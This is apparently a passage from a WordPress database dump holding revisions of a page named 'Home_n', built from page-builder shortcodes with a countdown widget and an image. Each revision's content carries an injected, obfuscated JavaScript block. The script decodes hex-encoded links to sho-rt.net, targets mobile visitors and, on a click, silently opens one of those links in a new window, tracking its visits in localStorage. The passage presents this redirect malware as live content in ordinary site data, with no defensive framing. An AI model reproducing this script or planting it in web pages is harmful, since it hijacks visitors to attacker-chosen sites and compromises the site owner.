,\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-08 21:49:39','2022-11-08 21:49:39','',3066,'https://gsw2023.com/?p=3081',0,'revision','',0),
(3082,1,'2022-11-08 21:52:25','2022-11-08 21:52:25','','2022-10-24_104116','','inherit','open','closed','','2022-10-24_104116','','','2022-11-08 21:52:25','2022-11-08 21:52:25','',3066,'https://gsw2023.com/wp-content/uploads/2022/11/2022-10-24_104116.jpg',0,'attachment','image/jpeg',0),
(3083,1,'2022-11-08 21:52:52','2022-11-08 21:52:52','[vc_row][vc_column width=\"1/2\"][vc_column_text]<strong>I am text block.</strong>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" br_style=\"solid\" br_color=\"#ffffff\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:Raleway|font_call:Raleway\" tick_unit_style=\"font-weight:700;\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3082\" img_size=\"799x452\"][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-08 21:52:52','2022-11-08 21:52:52','',3066,'https://gsw2023.com/?p=3083',0,'revision','',0),
(3084,1,'2022-11-08 21:53:48','2022-11-08 21:53:48','[vc_row][vc_column width=\"1/2\"][vc_column_text]<strong>I am text block.</strong>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" br_style=\"solid\" br_color=\"#ffffff\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:Raleway|font_call:Raleway\" tick_unit_style=\"font-weight:700;\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3082\" img_size=\"798x452\"][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const 